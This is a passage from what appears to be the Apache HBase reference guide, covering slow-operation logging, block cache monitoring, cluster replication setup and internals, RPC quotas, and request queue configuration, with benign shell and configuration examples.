2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {"tables":{"riley2":{"puts":[{"totalColumns":11,"families":{"actions":[{"timestamp":1315501284459,"qualifier":"0","vlen":9667580},{"timestamp":1315501284459,"qualifier":"1","vlen":10122412},{"timestamp":1315501284459,"qualifier":"2","vlen":11104617},{"timestamp":1315501284459,"qualifier":"3","vlen":13430635}]},"row":"cfcd208495d565ef66e7dff9f98764da:0"}],"families":["actions"]}},"processingtimems":956,"client":"10.47.34.63:33623","starttimems":1315501284456,"queuetimems":0,"totalPuts":1,"class":"HRegionServer","responsesize":0,"method":"multiPut"}
----

Note that everything inside the "tables" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP/port.
Other client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.
In the case that the call is not a client operation, that detailed fingerprint information will be completely absent.

This particular example would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the "vlen," or value length, fields of each put in the multiPut.
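Because each entry carries one of the four tags listed above, pulling the slow-query events out of a busy region server log is a one-liner. A sketch (the log path is illustrative):

----
$ grep -E '\((operationTooSlow|operationTooLarge|responseTooSlow|responseTooLarge)\)' \
    /var/log/hbase/hbase-regionserver.log
----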
=== Block Cache Monitoring

Starting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.
To view the block cache reports, see the Block Cache section of the region server UI.
Following are a few examples of the reporting capabilities.

.Basic Info
image::bc_basic.png[]

.Config
image::bc_config.png[]

.Stats
image::bc_stats.png[]

.L1 and L2
image::bc_l1.png[]

This is not an exhaustive list of all the screens and reports available.
Have a look in the Web UI.

== Cluster Replication

NOTE: This information was previously available at
link:https://hbase.apache.org/0.94/replication.html[Cluster Replication].

HBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.
Some use cases for cluster replication include:

* Backup and disaster recovery
* Data aggregation
* Geographic data distribution
* Online data ingestion combined with offline data analytics

NOTE: Replication is enabled at the granularity of the column family.
Before enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.

=== Replication Overview

Cluster replication uses a source-push methodology.
An HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.
Replication is asynchronous, and the goal of replication is eventual consistency.
When the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that column family on the RegionServer managing the relevant region.

When data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.
In HBase 0.96 and newer (link:https://issues.apache.org/jira/browse/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.
This prevents replication loops.

The WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.
Each region server reads from the oldest log it needs to replicate and keeps track of its progress processing WALs inside ZooKeeper to simplify failure recovery.
The position marker which indicates a slave cluster's progress, as well as the queue of WALs to process, may be different for every slave cluster.

The clusters participating in replication can be of different sizes.
The master cluster relies on randomization to attempt to balance the stream of replication on the slave clusters.
It is expected that the slave cluster has storage capacity to hold the replicated data, as well as any data it is responsible for ingesting.
If a slave cluster runs out of room, or is inaccessible for other reasons, it throws an error, and the master retains the WAL and retries the replication at intervals.

.Consistency Across Replicated Clusters
[WARNING]
====
How your application builds on top of the HBase API matters when replication is in play. HBase's replication system provides at-least-once delivery of client edits for an enabled column family to each configured destination cluster. In the event of failure to reach a given destination, the replication system will retry sending edits in a way that might repeat a given message.
HBase supports two modes of replication: the original replication, and serial replication. With the original mode, there is no guaranteed order of delivery for client edits. In the event of a RegionServer failing, recovery of the replication queue happens independently of recovery of the individual regions that server was previously handling. This means that it is possible for the not-yet-replicated edits to be serviced by a RegionServer that is currently slower to replicate than the one that handles edits from after the failure.

The combination of these two properties (at-least-once delivery and the lack of message ordering) means that some destination clusters may end up in a different state if your application makes use of operations that are not idempotent, e.g. Increments.

To solve this problem, HBase now supports serial replication, which sends edits to the destination cluster in the same order as the requests arrived from the client.
====

.Terminology Changes
[NOTE]
====
Previously, terms such as [firstterm]_master-master_, [firstterm]_master-slave_, and [firstterm]_cyclical_ were used to describe replication relationships in HBase.
These terms added confusion, and have been abandoned in favor of discussions about cluster topologies appropriate for different scenarios.
====

.Cluster Topologies
* A central source cluster might propagate changes out to multiple destination clusters, for failover or due to geographic distribution.
* A source cluster might push changes to a destination cluster, which might also push its own changes back to the original cluster.
* Many different low-latency clusters might push changes to one centralized cluster for backup or resource-intensive data analytics jobs.
  The processed data might then be replicated back to the low-latency clusters.

Multiple levels of replication may be chained together to suit your organization's needs.
The following diagram shows a hypothetical scenario.
Use the arrows to follow the data paths.

.Example of a Complex Cluster Replication Configuration
image::hbase_replication_diagram.jpg[]

HBase replication borrows many concepts from the [firstterm]_statement-based replication_ design used by MySQL.
Instead of SQL statements, entire WALEdits (consisting of multiple cell inserts coming from Put and Delete operations on the clients) are replicated in order to maintain atomicity.

[[hbase.replication.management]]
=== Managing and Configuring Cluster Replication
.Cluster Configuration Overview

. Configure and start the source and destination clusters.
  Create tables with the same names and column families on both the source and destination clusters, so that the destination cluster knows where to store data it will receive.
. All hosts in the source and destination clusters should be reachable to each other.
. If both clusters use the same ZooKeeper cluster, you must use a different `zookeeper.znode.parent`, because they cannot write in the same folder.
. On the source cluster, in HBase Shell, add the destination cluster as a peer, using the `add_peer` command.
. On the source cluster, in HBase Shell, enable the table replication, using the `enable_table_replication` command.
. Check the logs to see if replication is taking place. If so, you will see messages like the following, coming from the ReplicationSource.
----
LOG.info("Replicating "+clusterId + " -> " + peerClusterId);
----
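Steps 4 and 5 of the overview might look like the following in a shell session. The ZooKeeper quorum, peer ID, and table name here are illustrative; substitute your own.

----
hbase(main):001:0> add_peer '1', 'zk1.example.com,zk2.example.com,zk3.example.com:2181:/hbase'
hbase(main):002:0> enable_table_replication 'my_table'
----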
If so, you will see messages like the following, coming from the ReplicationSource.
----
LOG.info("Replicating "+clusterId + " -> " + peerClusterId);
----

.Serial Replication Configuration
See <<Serial Replication,Serial Replication>>

.Cluster Management Commands
add_peer <ID> <CLUSTER_KEY>::
 Adds a replication relationship between two clusters. +
 * ID -- a unique string, which must not contain a hyphen.
 * CLUSTER_KEY: composed using the following template, with appropriate place-holders: `hbase.zookeeper.quorum:hbase.zookeeper.property.clientPort:zookeeper.znode.parent`
 * STATE (optional): ENABLED or DISABLED, default value is ENABLED
list_peers:: List all replication relationships known by this cluster
enable_peer <ID>::
 Enable a previously-disabled replication relationship
disable_peer <ID>::
 Disable a replication relationship. HBase will no longer send edits to that
 peer cluster, but it still keeps track of all the new WALs that it will need
 to replicate if and when it is re-enabled. WALs are retained when enabling or disabling
 replication as long as peers exist.
remove_peer <ID>::
 Disable and remove a replication relationship. HBase will no longer send edits to that peer cluster or keep track of WALs.
enable_table_replication <TABLE_NAME>::
 Enable the table replication switch for all of its column families. If the table is not found in the destination cluster, it will be created there with the same name and column families.
disable_table_replication <TABLE_NAME>::
 Disable the table replication switch for all of its column families.
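
As a quick illustration, the following HBase Shell session strings these commands together; the peer ID, cluster key, and table name are placeholders, and the exact argument syntax can vary between HBase versions:

----
hbase> add_peer '1', 'zk1.example.com:2181:/hbase'
hbase> enable_table_replication 'my_table'
hbase> list_peers
hbase> disable_peer '1'
----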

=== Serial Replication

NOTE: This feature was introduced in HBase 1.5.

.Function of serial replication
Serial replication pushes logs to the destination cluster in the same order in which they arrived at the source cluster.

.Why is serial replication needed?
In HBase replication, mutations are pushed to the destination cluster by reading the WAL on each region server. There is a queue of WAL files, so they can be read in order of creation time. However, when a region move or RS failure occurs in the source cluster, the hlog entries that were not pushed before the region move or RS failure will be pushed by the original RS (for a region move) or by another RS which takes over the remaining hlog of the dead RS (for an RS failure), while the new entries for the same region(s) will be pushed by the RS which now serves the region(s). The two push the hlog entries of the same region concurrently, without coordination.

This treatment can possibly lead to data inconsistency between the source and destination clusters:

1. A put and then a delete are written to the source cluster.

2. Due to a region move or RS failure, they are pushed to the peer cluster by different replication-source threads.

3. If the delete is pushed to the peer cluster before the put, and a flush and major compaction occur in the peer cluster before the put arrives, the delete is collected and the put remains in the peer cluster, while in the source cluster the put is masked by the delete. Hence, data is inconsistent between the source and destination clusters.

.Serial replication configuration
. Set REPLICATION_SCOPE=>2 on the column family which is to be replicated serially when creating tables.

 REPLICATION_SCOPE is a column-family-level attribute. Its value can be 0, 1 or 2. Value 0 means replication is disabled, 1 means replication is enabled but log order is not guaranteed, and 2 means serial replication is enabled.

. This feature relies on zk-less assignment, and conflicts with distributed log replay, so users must set `hbase.assignment.usezk=false` and `hbase.master.distributed.log.replay=false` to support this feature. (Note that distributed log replay is deprecated and has already been purged from 2.0.)
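
For example, a table with one serially replicated column family might be created like this (the table and family names are placeholders):

----
hbase> create 't1', {NAME => 'cf1', REPLICATION_SCOPE => 2}
----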

.Limitations in serial replication
Logs from one RS are currently read and pushed to one peer in a single thread, so if one log has not been pushed, all logs after it will be blocked. One WAL file may contain edits from different tables; if one of those tables (or one of its column families) has REPLICATION_SCOPE set to 2 and is blocked, then all edits are blocked, even though the other tables do not need serial replication. If you want to prevent this, you need to split these tables/column families across different peers.

More details about serial replication can be found in link:https://issues.apache.org/jira/browse/HBASE-9465[HBASE-9465].

=== Verifying Replicated Data

The `VerifyReplication` MapReduce job, which is included in HBase, performs a systematic comparison of replicated data between two different clusters. Run the VerifyReplication job on the master cluster, supplying it with the peer ID and table name to use for validation. You can limit the verification further by specifying a time range or specific families. The job's short name is `verifyrep`. To run the job, use a command like the following:

[source,bash]
----
$ HADOOP_CLASSPATH=`${HBASE_HOME}/bin/hbase classpath` "${HADOOP_HOME}/bin/hadoop" jar "${HBASE_HOME}/hbase-server-VERSION.jar" verifyrep --starttime=<timestamp> --endtime=<timestamp> --families=<myFam> <ID> <tableName>
----

The `VerifyReplication` command prints out `GOODROWS` and `BADROWS` counters to indicate rows that did and did not replicate correctly.

=== Detailed Information About Cluster Replication

.Replication Architecture Overview
image::replication_overview.png[]

==== Life of a WAL Edit

A single WAL edit goes through several steps in order to be replicated to a slave cluster.

. An HBase client uses a Put or Delete operation to manipulate data in HBase.
. The region server writes the request to the WAL in a way that allows it to be replayed if the write is not successful.
. If the changed cell corresponds to a column family that is scoped for replication, the edit is added to the queue for replication.
. In a separate thread, the edit is read from the log, as part of a batch process.
 Only the KeyValues that are eligible for replication are kept.
 Replicable KeyValues are part of a column family whose schema is scoped GLOBAL, are not part of a catalog such as `hbase:meta`, did not originate from the target slave cluster, and have not already been consumed by the target slave cluster.
. The edit is tagged with the master's UUID and added to a buffer.
 When the buffer is filled, or the reader reaches the end of the file, the buffer is sent to a random region server on the slave cluster.
. The region server reads the edits sequentially and separates them into buffers, one buffer per table.
 After all edits are read, each buffer is flushed using link:https://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Table.html[Table], HBase's normal client.
 The master's UUID and the UUIDs of slaves which have already consumed the data are preserved in the edits when they are applied, in order to prevent replication loops.
. In the master, the offset for the WAL that is currently being replicated is registered in ZooKeeper.

If the slave cluster is unavailable, the process changes as follows:

. The first three steps, where the edit is inserted, are identical.
. Again in a separate thread, the region server reads, filters, and edits the log edits in the same way as above.
 The slave region server does not answer the RPC call.
. The master sleeps and tries again a configurable number of times.
. If the slave region server is still not available, the master selects a new subset of region servers to replicate to, and tries again to send the buffer of edits.
. Meanwhile, the WALs are rolled and stored in a queue in ZooKeeper.
 Logs that are [firstterm]_archived_ by their region server, by moving them from the region server's log directory to a central log directory, will update their paths in the in-memory queue of the replicating thread.
. When the slave cluster is finally available, the buffer is applied in the same way as during normal processing.
 The master region server will then replicate the backlog of logs that accumulated during the outage.

.Spreading Queue Failover Load
When replication is active, a subset of region servers in the source cluster is responsible for shipping edits to the sink.
This responsibility must be failed over like all other region server functions should a process or node crash.
The following configuration settings are recommended for maintaining an even distribution of replication activity over the remaining live servers in the source cluster:

* Set `replication.source.maxretriesmultiplier` to `300`.
* Set `replication.source.sleepforretries` to `1` (1 second). This value, combined with the value of `replication.source.maxretriesmultiplier`, causes the retry cycle to last about 5 minutes.
* Set `replication.sleep.before.failover` to `30000` (30 seconds) in the source cluster site configuration.
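
Expressed as an _hbase-site.xml_ fragment on the source cluster, these recommendations would look like the following sketch:

[source,xml]
----
<property>
  <name>replication.source.maxretriesmultiplier</name>
  <value>300</value>
</property>
<property>
  <name>replication.source.sleepforretries</name>
  <value>1</value>
</property>
<property>
  <name>replication.sleep.before.failover</name>
  <value>30000</value>
</property>
----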

[[cluster.replication.preserving.tags]]
.Preserving Tags During Replication
By default, the codec used for replication between clusters strips tags, such as cell-level ACLs, from cells.
To prevent the tags from being stripped, you can use a different codec which does not strip them.
Configure `hbase.replication.rpc.codec` to use `org.apache.hadoop.hbase.codec.KeyValueCodecWithTags`, on both the source and sink RegionServers involved in the replication.
This option was introduced in link:https://issues.apache.org/jira/browse/HBASE-10322[HBASE-10322].

==== Replication Internals

Replication State in ZooKeeper::
 HBase replication maintains its state in ZooKeeper.
 By default, the state is contained in the base node _/hbase/replication_.
 This node contains two child nodes, the `Peers` znode and the `RS` znode.

The `Peers` Znode::
 The `peers` znode is stored in _/hbase/replication/peers_ by default.
 It consists of a list of all peer replication clusters, along with the status of each of them.
 The value of each peer is its cluster key, which is provided in the HBase Shell.
 The cluster key contains a list of ZooKeeper nodes in the cluster's quorum, the client port for the ZooKeeper quorum, and the base znode for HBase on that cluster.

The `RS` Znode::
 The `rs` znode contains a list of WAL logs which need to be replicated.
 This list is divided into a set of queues organized by region server and the peer cluster the region server is shipping the logs to.
 The rs znode has one child znode for each region server in the cluster.
 The child znode name is the region server's hostname, client port, and start code.
 This list includes both live and dead region servers.

==== Choosing Region Servers to Replicate To

When a master cluster region server initiates a replication source to a slave cluster, it first connects to the slave's ZooKeeper ensemble using the provided cluster key. It then scans the _rs/_ directory to discover all the available sinks (region servers that are accepting incoming streams of edits to replicate) and randomly chooses a subset of them using a configured ratio which has a default value of 10%. For example, if a slave cluster has 150 machines, 15 will be chosen as potential recipients for edits that this master cluster region server sends.
Because this selection is performed by each master region server, the probability that all slave region servers are used is very high, and this method works for clusters of any size.
For example, a master cluster of 10 machines replicating to a slave cluster of 5 machines with a ratio of 10% causes the master cluster region servers to choose one machine each at random.

A ZooKeeper watcher is placed on the _${zookeeper.znode.parent}/rs_ node of the slave cluster by each of the master cluster's region servers.
This watch is used to monitor changes in the composition of the slave cluster.
When nodes are removed from the slave cluster, or if nodes go down or come back up, the master cluster's region servers will respond by selecting a new pool of slave region servers to replicate to.

==== Keeping Track of Logs

Each master cluster region server has its own znode in the replication znodes hierarchy.
It contains one znode per peer cluster (if there are 5 slave clusters, 5 znodes are created), and each of these contains a queue of WALs to process.
Each of these queues will track the WALs created by that region server, but they can differ in size.
For example, if one slave cluster becomes unavailable for some time, the WALs should not be deleted, so they need to stay in the queue while the others are processed.
See <<rs.failover.details,rs.failover.details>> for an example.

When a source is instantiated, it contains the current WAL that the region server is writing to.
During log rolling, the new file is added to the queue of each slave cluster's znode just before it is made available.
This ensures that all the sources are aware that a new log exists before the region server is able to append edits into it, but this operation is now more expensive.
The queue items are discarded when the replication thread cannot read more entries from a file (because it reached the end of the last block) and there are other files in the queue.
This means that if a source is up to date and replicates from the log that the region server writes to, reading up to the "end" of the current file will not delete the item in the queue.

A log can be archived if it is no longer used or if the number of logs exceeds `hbase.regionserver.maxlogs` because the insertion rate is faster than regions are flushed.
When a log is archived, the source threads are notified that the path for that log changed.
If a particular source has already finished with an archived log, it will just ignore the message.
If the log is in the queue, the path will be updated in memory.
If the log is currently being replicated, the change will be done atomically so that the reader doesn't attempt to open the file when it has already been moved.
Because moving a file is a NameNode operation, if the reader is currently reading the log, it won't generate any exception.
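
If you need to inspect these znodes directly, the `hbase zkcli` utility can list them. A minimal sketch, assuming the default `zookeeper.znode.parent` and a hypothetical region server name and peer ID:

----
$ bin/hbase zkcli
ls /hbase/replication/rs
ls /hbase/replication/rs/server1.example.com,16020,1234567890/1
----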

==== Reading, Filtering and Sending Edits

By default, a source attempts to read from a WAL and ship log entries to a sink as quickly as possible.
Speed is limited by the filtering of log entries: only KeyValues that are scoped GLOBAL and that do not belong to catalog tables will be retained.
Speed is also limited by the total size of the list of edits to replicate per slave, which is limited to 64 MB by default.
With this configuration, a master cluster region server with three slaves would use at most 192 MB to store data to replicate.
This does not account for the data which was filtered but not garbage collected.

Once the maximum size of edits has been buffered or the reader reaches the end of the WAL, the source thread stops reading and chooses at random a sink to replicate to (from the list that was generated by keeping only a subset of slave region servers). It directly issues an RPC to the chosen region server and waits for the method to return.
If the RPC was successful, the source determines whether the current file has been emptied or whether it contains more data which needs to be read.
If the file has been emptied, the source deletes the znode in the queue.
Otherwise, it registers the new offset in the log's znode.
If the RPC threw an exception, the source will retry 10 times before trying to find a different sink.

==== Cleaning Logs

If replication is not enabled, the master's log-cleaning thread deletes old logs using a configured TTL.
This TTL-based method does not work well with replication, because archived logs which have exceeded their TTL may still be in a queue.
The default behavior is augmented so that if a log is past its TTL, the cleaning thread looks up every queue until it finds the log, while caching queues it has found.
If the log is not found in any queues, the log will be deleted.
The next time the cleaning process needs to look for a log, it starts by using its cached list.

NOTE: WALs are saved when replication is enabled or disabled as long as peers exist.

[[rs.failover.details]]
==== Region Server Failover

When no region servers are failing, keeping track of the logs in ZooKeeper adds no value.
Unfortunately, region servers do fail, and since ZooKeeper is highly available, it is useful for managing the transfer of the queues in the event of a failure.

Each of the master cluster region servers keeps a watcher on every other region server, in order to be notified when one dies (just as the master does).
When a failure happens, they all race to create a znode called `lock` inside the dead region server's znode that contains its queues.
The region server that creates it successfully then transfers all the queues to its own znode, one at a time since ZooKeeper does not support renaming queues.
After the queues are all transferred, they are deleted from the old location.
The znodes that were recovered are renamed with the ID of the slave cluster appended with the name of the dead server.

Next, the master cluster region server creates one new source thread per copied queue, and each of the source threads follows the read/filter/ship pattern.
The main difference is that those queues will never receive new data, since they do not belong to their new region server.
When the reader hits the end of the last log, the queue's znode is deleted and the master cluster region server closes that replication source.

Given a master cluster with 3 region servers replicating to a single slave with id `2`, the following hierarchy represents what the znodes layout could be at some point in time.
The region servers' znodes all contain a `peers` znode which contains a single queue.
The znode names in the queues represent the actual file names on HDFS in the form `address,port.timestamp`.

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1234 (Contains a position)
      1.1.1.1,60020.1265
  1.1.1.2,60020,123456790/
    2/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
  1.1.1.3,60020,123456630/
    2/
      1.1.1.3,60020.1280 (Contains a position)
----

Assume that 1.1.1.2 loses its ZooKeeper session.
The survivors will race to create a lock, and, arbitrarily, 1.1.1.3 wins.
It will then start transferring all the queues to its local peers znode by appending the name of the dead server.
Right before 1.1.1.3 is able to clean up the old znodes, the layout will look like the following:

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1234 (Contains a position)
      1.1.1.1,60020.1265
  1.1.1.2,60020,123456790/
    lock
    2/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
  1.1.1.3,60020,123456630/
    2/
      1.1.1.3,60020.1280 (Contains a position)
    2-1.1.1.2,60020,123456790/
      1.1.1.2,60020.1214 (Contains a position)
      1.1.1.2,60020.1248
      1.1.1.2,60020.1312
----

Some time later, but before 1.1.1.3 is able to finish replicating the last WAL from 1.1.1.2, it dies too.
Some new logs were also created in the normal queues.
The last region server will then try to lock 1.1.1.3's znode and will begin transferring all the queues.
The new layout will be:

----
/hbase/replication/rs/
  1.1.1.1,60020,123456780/
    2/
      1.1.1.1,60020.1378 (Contains a position)
    2-1.1.1.3,60020,123456630/
      1.1.1.3,60020.1325 (Contains a position)
      1.1.1.3,60020.1401
    2-1.1.1.2,60020,123456790-1.1.1.3,60020,123456630/
      1.1.1.2,60020.1312 (Contains a position)
  1.1.1.3,60020,123456630/
    lock
    2/
      1.1.1.3,60020.1325 (Contains a position)
      1.1.1.3,60020.1401
    2-1.1.1.2,60020,123456790/
      1.1.1.2,60020.1312 (Contains a position)
----

=== Replication Metrics

The following metrics are exposed at the global region server level and at the peer level:

`source.sizeOfLogQueue`::
 number of WALs to process (excludes the one which is being processed) at the Replication source

`source.shippedOps`::
 number of mutations shipped

`source.logEditsRead`::
 number of mutations read from WALs at the replication source

`source.ageOfLastShippedOp`::
 age of the last batch that was shipped by the replication source

`source.completedLogs`::
 The number of write-ahead-log files that have completed their acknowledged sending to the peer associated with this source. Increments to this metric are a part of normal operation of HBase replication.

`source.completedRecoverQueues`::
 The number of recovery queues this source has completed sending to the associated peer. Increments to this metric are a part of normal recovery of HBase replication in the face of failed Region Servers.

`source.uncleanlyClosedLogs`::
 The number of write-ahead-log files the replication system considered completed after reaching the end of readable entries in the face of an uncleanly closed file.

`source.ignoredUncleanlyClosedLogContentsInBytes`::
 When a write-ahead-log file is not closed cleanly, there will likely be some entry that has been partially serialized. This metric contains the number of bytes of such entries the HBase replication system believes were remaining at the end of files skipped in the face of an uncleanly closed file. Those bytes should either be in a different file or represent a client write that was not acknowledged.

`source.restartedLogReading`::
 The number of times the HBase replication system detected that it failed to correctly parse a cleanly closed write-ahead-log file. In this circumstance, the system replays the entire log from the beginning, ensuring that no edits fail to be acknowledged by the associated peer. Increments to this metric indicate that the HBase replication system is having difficulty correctly handling failures in the underlying distributed storage system. No data loss should occur, but you should check Region Server log files for details of the failures.

`source.repeatedLogFileBytes`::
 When the HBase replication system determines that it needs to replay a given write-ahead-log file, this metric is incremented by the number of bytes the replication system believes had already been acknowledged by the associated peer prior to starting over.

`source.closedLogsWithUnknownFileLength`::
 Incremented when the HBase replication system believes it is at the end of a write-ahead-log file but it cannot determine the length of that file in the underlying distributed storage system. Could indicate data loss since the replication system is unable to determine if the end of readable entries lines up with the expected end of the file.
You should check Region Server log files for details of the failures.

=== Replication Configuration Options

[cols="1,1,1", options="header"]
|===
| Option
| Description
| Default

| zookeeper.znode.parent
| The name of the base ZooKeeper znode used for HBase
| /hbase

| zookeeper.znode.replication
| The name of the base znode used for replication
| replication

| zookeeper.znode.replication.peers
| The name of the peer znode
| peers

| zookeeper.znode.replication.peers.state
| The name of the peer-state znode
| peer-state

| zookeeper.znode.replication.rs
| The name of the rs znode
| rs

| replication.sleep.before.failover
| How many milliseconds a worker should sleep before attempting to replicate
 a dead region server's WAL queues.
|

| replication.executor.workers
| The number of region servers a given region server should attempt to
 fail over simultaneously.
| 1
|===

=== Monitoring Replication Status

You can use the HBase Shell command `status 'replication'` to monitor the replication status on your cluster. The command has three variations:

* `status 'replication'` -- prints the status of each source and its sinks, sorted by hostname.
* `status 'replication', 'source'` -- prints the status for each replication source, sorted by hostname.
* `status 'replication', 'sink'` -- prints the status for each replication sink, sorted by hostname.

== Running Multiple Workloads On a Single Cluster

HBase provides the following mechanisms for managing the performance of a cluster
handling multiple workloads:

. <<quota>>
. <<request_queues>>
. <<multiple-typed-queues>>

[[quota]]
=== Quotas
HBASE-11598 introduces RPC quotas, which allow you to throttle requests based on
the following limits:

. <<request-quotas,The number or size of requests (read, write, or read+write) in a given timeframe>>
. <<namespace_quotas,The number of tables allowed in a namespace>>

These limits can be enforced for a specified user, table, or namespace.

.Enabling Quotas
Quotas are disabled by default. To enable the feature, set the `hbase.quota.enabled`
property to `true` in the _hbase-site.xml_ file for all cluster nodes.
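
For example, the property looks like this in _hbase-site.xml_:

[source,xml]
----
<property>
  <name>hbase.quota.enabled</name>
  <value>true</value>
</property>
----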

.General Quota Syntax
. THROTTLE_TYPE can be expressed as READ, WRITE, or the default type (read + write).
. Timeframes can be expressed in the following units: `sec`, `min`, `hour`, `day`
. Request sizes can be expressed in the following units: `B` (bytes), `K` (kilobytes),
`M` (megabytes), `G` (gigabytes), `T` (terabytes), `P` (petabytes)
. Numbers of requests are expressed as an integer followed by the string `req`
. Limits relating to time are expressed as req/time or size/time. For instance `10req/day`
or `100P/hour`.
. Numbers of tables or regions are expressed as integers.

[[request-quotas]]
.Setting Request Quotas
You can set quota rules ahead of time, or you can change the throttle at runtime. The change
will propagate after the quota refresh period has expired. This expiration period
defaults to 5 minutes. To change it, modify the `hbase.quota.refresh.period` property
in `hbase-site.xml`. This property is expressed in milliseconds and defaults to `300000`.

----
# Limit user u1 to 10 requests per second
hbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10req/sec'

# Limit user u1 to 10 read requests per second
hbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', LIMIT => '10req/sec'

# Limit user u1 to 10 M per day everywhere
hbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => '10M/day'

# Limit user u1 to 10 M write size per sec
hbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => WRITE, USER => 'u1', LIMIT => '10M/sec'

# Limit user u1 to 5k per minute on table t2
hbase> set_quota TYPE => THROTTLE, USER => 'u1', TABLE => 't2', LIMIT => '5K/min'

# Limit user u1 to 10 read requests per sec on table t2
hbase> set_quota TYPE => THROTTLE, THROTTLE_TYPE => READ, USER => 'u1', TABLE => 't2', LIMIT => '10req/sec'

# Remove an existing limit from user u1 on namespace ns2
hbase> set_quota TYPE => THROTTLE, USER => 'u1', NAMESPACE => 'ns2', LIMIT => NONE

# Limit all users to 10 requests per hour on namespace ns1
hbase> set_quota TYPE => THROTTLE, NAMESPACE => 'ns1', LIMIT => '10req/hour'

# Limit all users to 10 T per hour on table t1
hbase> set_quota TYPE => THROTTLE, TABLE => 't1', LIMIT => '10T/hour'

# Remove all existing limits from user u1
hbase> set_quota TYPE => THROTTLE, USER => 'u1', LIMIT => NONE

# List all quotas for user u1 in namespace ns2
hbase> list_quotas USER => 'u1', NAMESPACE => 'ns2'

# List all quotas for namespace ns2
hbase> list_quotas NAMESPACE => 'ns2'

# List all quotas for table t1
hbase> list_quotas TABLE => 't1'

# list all quotas
hbase> list_quotas
----

You can also place a global limit and exclude a user or a table from the limit by applying the
`GLOBAL_BYPASS` property.

----
hbase> set_quota NAMESPACE => 'ns1', LIMIT => '100req/min' # a per-namespace request limit
hbase> set_quota USER => 'u1', GLOBAL_BYPASS => true # user u1 is not affected by the limit
----

[[namespace_quotas]]
.Setting Namespace Quotas
You can specify the maximum number of tables or regions allowed in a given namespace, either
when you create the namespace or by altering an existing namespace, by setting the
`hbase.namespace.quota.maxtables` property on the namespace.

.Limiting Tables Per Namespace
----
# Create a namespace with a max of 5 tables
hbase> create_namespace 'ns1', {'hbase.namespace.quota.maxtables'=>'5'}

# Alter an existing namespace to have a max of 8 tables
hbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxtables'=>'8'}

# Show quota information for a namespace
hbase> describe_namespace 'ns2'

# Alter an existing namespace to remove a quota
hbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=>'hbase.namespace.quota.maxtables'}
----

.Limiting Regions Per Namespace
----
# Create a namespace with a max of 10 regions
hbase> create_namespace 'ns1', {'hbase.namespace.quota.maxregions'=>'10'}

# Show quota information for a namespace
hbase> describe_namespace 'ns1'

# Alter an existing namespace to have a max of 20 regions
hbase> alter_namespace 'ns2', {METHOD => 'set', 'hbase.namespace.quota.maxregions'=>'20'}

# Alter an existing namespace to remove a quota
hbase> alter_namespace 'ns2', {METHOD => 'unset', NAME=> 'hbase.namespace.quota.maxregions'}
----

[[request_queues]]
=== Request Queues
If no throttling policy is configured, when the RegionServer receives multiple requests,
they are now placed into a queue waiting for a free execution slot (HBASE-6721).
The simplest queue is a FIFO queue, where each request waits for all previous requests in the queue
to finish before running. Fast or interactive queries can get stuck behind large requests.

If you are able to guess how long a request will take, you can reorder requests by
pushing the long requests to the end of the queue and allowing short requests to preempt
them. Eventually, you must still execute the large requests and prioritize the new
requests behind them. The short requests will be newer, so the result is not terrible,
but still suboptimal compared to a mechanism which allows large requests to be split
into multiple smaller ones.

HBASE-10993 introduces such a system for deprioritizing long-running scanners. There
are two types of queues, `fifo` and `deadline`. To configure the type of queue used,
configure the `hbase.ipc.server.callqueue.type` property in `hbase-site.xml`. There
is no way to estimate how long each request may take, so de-prioritization only affects
scans, and is based on the number of “next” calls a scan request has made. An assumption
is made that when you are doing a full table scan, your job is not likely to be interactive,
so if there are concurrent requests, you can delay long-running scans up to a limit tunable by
setting the `hbase.ipc.server.queue.max.call.delay` property. The slope of the delay is calculated
by a simple square root of `(numNextCall * weight)` where the weight is
configurable by setting the `hbase.ipc.server.scan.vtime.weight` property.

[[multiple-typed-queues]]
=== Multiple-Typed Queues

You can also prioritize or deprioritize different kinds of requests by configuring
a specified number of dedicated handlers and queues. You can segregate the scan requests
in a single queue with a single handler, and all the other available queues can service
short `Get` requests.

You can adjust the IPC queues and handlers based on the type of workload, using static
tuning options. This approach is an interim first step that will eventually allow
you to change the settings at runtime, and to dynamically adjust values based on the load.

.Multiple Queues
To avoid contention and separate different kinds of requests, configure the
`hbase.ipc.server.callqueue.handler.factor` property, which allows you to increase the number of
queues and control how many handlers can share the same queue.

Using more queues reduces contention when adding a task to a queue or selecting it
from a queue. You can even configure one queue per handler. The trade-off is that
if some queues contain long-running tasks, a handler may need to wait to execute from that queue
rather than stealing from another queue which has waiting tasks.

.Read and Write Queues
With multiple queues, you can now divide read and write requests, giving more priority
(more queues) to one or the other type. Use the `hbase.ipc.server.callqueue.read.ratio`
property to choose to serve more reads or more writes.
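
As a sketch, an _hbase-site.xml_ fragment that splits the call queues and favors reads might look like the following; the values are illustrative, not recommendations:

[source,xml]
----
<!-- Use one call queue for every two handlers -->
<property>
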